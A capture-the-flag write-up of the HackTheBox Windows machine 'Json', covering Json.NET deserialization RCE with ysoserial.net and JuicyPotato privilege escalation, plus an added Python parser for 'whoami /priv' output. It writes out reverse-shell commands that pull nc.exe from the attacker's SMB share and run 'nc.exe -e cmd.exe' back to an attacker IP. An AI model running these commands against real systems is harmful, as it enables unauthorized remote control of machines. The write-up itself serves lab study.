HackTheBox Json Writeup
Overview
This is a writeup of the HackTheBox machine Json.
OS: Windows
IP: 10.10.10.158
Difficulty: Medium
Information Gathering
Running nmap against the target shows several open ports; the web application is where we start.
Getting User
Starting with the website, we land on a login page where the default credentials admin:admin grant access.
Intercepting the login request with Burp Suite, we see that both the cookie and the Bearer header value are base64-encoded strings. The Bearer value decodes to a JSON object, and the server deserializes it with Json.NET (Newtonsoft) on every request, which is what makes the Json.Net gadget chains in ysoserial.net applicable here.
Editing the Bearer value changes the server's response, which confirms that the value is deserialized server-side rather than compared as an opaque token, so we can use the ysoserial.net tool to get RCE. I first tested that I could ping myself by using the command
.\ysoserial.exe -f Json.Net -g ObjectDataProvider -o base64 -c "ping -n 2 10.10.14.27"
This returned successfully, so I could then proceed to use it to get an actual shell by setting up an SMB server so that I could access nc.exe.
python3 smbserver.py smb /root/Desktop/Json/smb
In the ysoserial payload I then used a netcat command and listened for the response on my host system.
\\10.10.14.28\smb\nc.exe 10.10.14.28 4444 -e cmd.exe
We now have a shell as the user (userpool) and can navigate to that user's Desktop directory to read user.txt.
Getting Root
Running the command whoami /priv
shows that SeImpersonatePrivilege is enabled.
We can therefore try the JuicyPotato executable for privilege escalation. JuicyPotato abuses SeImpersonatePrivilege by coercing a DCOM server that runs as SYSTEM (the CLSID passed with -c) into authenticating to a local listener (port given with -l) and then impersonating the captured SYSTEM token to launch the program given with -p; -t * tries both CreateProcessWithTokenW and CreateProcessAsUser. The CLSID must be one that is valid for the target's Windows version, and the technique does not work on Windows 10 1809 / Server 2019 and later, where the newer PrintSpoofer and RoguePotato variants are used instead.
I started by creating a rev.bat file with my reverse shell.
c:\Users\userpool\AppData\Local\Temp> echo \\10.10.14.28\smb\nc.exe -e cmd.exe 10.10.14.28 1340 > rev.bat
Then I put JuicyPotato.exe onto the same SMB server I had running, so that from the user shell I could execute the command.
\\10.10.14.28\smb\JuicyPotato.exe -l 1337 -p C:\Users\userpool\Appdata\Local\Temp\rev.bat -t * -c {e60687f7-01a1-40aa-86ac-db1cbf673334}
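The whoami /priv check above is the decision point for the whole escalation, so here is an added Python example (not code from the original writeup or from JuicyPotato) that parses the tool's output and reports whether a potato-style attack is worth attempting. The sample output is constructed to resemble an IIS application-pool identity and assumes the English-language column layout of whoami /priv; the only fact taken from the page is that SeImpersonatePrivilege is enabled.

```python
import re

# Constructed sample of `whoami /priv` output for an IIS application-pool
# identity. The page only reports SeImpersonatePrivilege as enabled; the other
# rows are typical for such an account and are included to exercise the parser.
SAMPLE_WHOAMI_PRIV = """
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# Either of these lets a process turn a captured SYSTEM impersonation token
# into a SYSTEM process, which is what JuicyPotato and its successors rely on.
POTATO_PRIVS = {"SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege"}


def parse_whoami_priv(text: str) -> dict:
    """Parse `whoami /priv` output into {privilege name: state}.

    Data rows start after the '=====' separator line. The privilege name is the
    first column and the state the last; the description in between may contain
    spaces, so only the first and last whitespace-separated tokens are used.
    """
    privs = {}
    in_table = False
    for line in text.splitlines():
        if re.match(r"^=+(\s+=+)*\s*$", line):
            in_table = True
            continue
        if not in_table or not line.strip():
            continue
        parts = line.split()
        if len(parts) < 2 or not parts[0].startswith("Se"):
            continue
        privs[parts[0]] = parts[-1]
    return privs


def potato_candidates(privs: dict) -> dict:
    """Return the potato-relevant privileges the token holds, with their state.

    A privilege shown as Disabled is still held by the token; the process can
    enable it itself with AdjustTokenPrivileges, so it still counts as a hit.
    """
    return {name: state for name, state in privs.items() if name in POTATO_PRIVS}


if __name__ == "__main__":
    privs = parse_whoami_priv(SAMPLE_WHOAMI_PRIV)
    hits = potato_candidates(privs)
    if hits:
        print("potato-style escalation is worth trying:", hits)
    else:
        print("no impersonation privileges held; look for another vector")
```

In practice you would paste the output of whoami /priv from the target shell into parse_whoami_priv; if it returns a hit, the remaining question is which potato variant matches the Windows version, as noted above.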
All that then had to be done was listen for the shell on my host system and find the root flag in the Desktop directory.